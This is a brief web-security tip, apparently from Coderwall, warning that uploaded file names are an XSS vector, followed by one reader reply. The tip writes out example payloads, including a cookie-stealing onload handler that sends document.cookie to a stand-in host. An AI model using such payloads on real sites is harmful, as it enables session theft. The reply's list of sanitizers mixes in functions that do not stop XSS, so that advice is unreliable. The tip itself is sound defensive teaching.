Web Security: File Names
One important thing to remember when it comes to developing web applications is you can never trust any of your users in any case. Humans are cruel; it's not unlikely someone will try to crawl their way in to your server or database.
When developing attachment, file upload, or similar systems, always remember to sanitize the file name.
Of course modern computer systems don't allow slashes in the file name so the following wouldn't work:
<body>hacked</body>.txt
Systems just don't like that. You cannot use slashes in file names. But a specially crafted file can be uploaded which could be used to steal cookies, redirect users, or modify the current page to the attacker's liking.
Examples:
// Simple alert
<body onload=alert(Hacked)>.txt
// Cookie stealer
<body onload=location.href="http:"+String.fromCharCode(47)+String.fromCharCode(47)+"localhost"+String.fromCharCode(47)+"test.php?data="+escape(document.cookie)>.txt
// etc
<em>ALWAYS</em> sanitize the file name. Keep yourself and your users safe. :)
Written by Nathan Malcolm
Related protips
1 Response
I Couldn't agree more with you, I wish I had mentioned this in my Pro Tip about sanitizing variables.
The only one thing I can add is HOW:
a) htmlspecialchars()
b) striptags()
c) stripslashes() / addslashes()
d) mysqlrealescapestring()
e) htmlentities()
And to be honest, hundreds of more methods of sanitizing data.
Awesome post.
Have a fresh tip? Share with Coderwall community!
